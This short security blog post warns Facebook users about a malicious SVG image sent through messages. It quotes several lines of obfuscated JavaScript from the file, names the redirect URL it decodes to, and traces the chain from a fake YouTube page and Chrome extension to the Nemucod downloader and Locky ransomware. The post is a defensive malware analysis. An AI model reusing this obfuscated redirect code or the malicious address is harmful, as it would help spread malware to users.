Have you received any kind of Image file through Facebook messages lately?
If yes, Is it in SVG Format?
If it is, Please don’t click on it.
Spammers have crafted malicious Image (SVG file) that will make you install ransomware on to your System and in turn infect all of your friends through the same medium i.e Facebook messages.
Scalable Vector Graphics (SVG) is an XML-based image format used to serve vector images. If you notice, Our logo is also in SVG format. You can download and inspect it by opening the file in a text editor.
What would happen if you click that Spam Image?
You can check out the SVG file code here:
If you look at the SVG file on Pastebin, Observe the lines 48 to 51
var hdekw = window;
var ljfji = bxtqxbl("q2wzN=IFPjjmkiEFlo",15,true);
var pryyb = bxtqxbl("xXnDUGnKZcx?URbam",9,false);
var lpvxzt = bxtqxbl("nso6/z",2,false);
hdekw[ljfji][pryyb][lpvxzt] = bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true);
Spammers have cleverly used cryptographic techniques to bypass Facebook’s file checkers and then execute a window function.
If you log these variables in the console:
You would get this:
Clearly it appears that the malicious SVG file is attempting to redirect you to https://mourid.com/php/trust.php, which happens to be a fake YouTube video page that will force you to install malicious Chrome Extension.
When the extension gets installed, It would then takes advantage of your browser’s access to your Facebook account to covertly SPAM your friends with the same SVG image file, Helping this SPAM to Spread more.
Furthermore, The extension also downloads “Nemucod downloader”, which is a generic malware downloader generally used to fetch and install various ransomware. In this case, the malware downloader downloads “Locky ransomware”, leaving your system locked.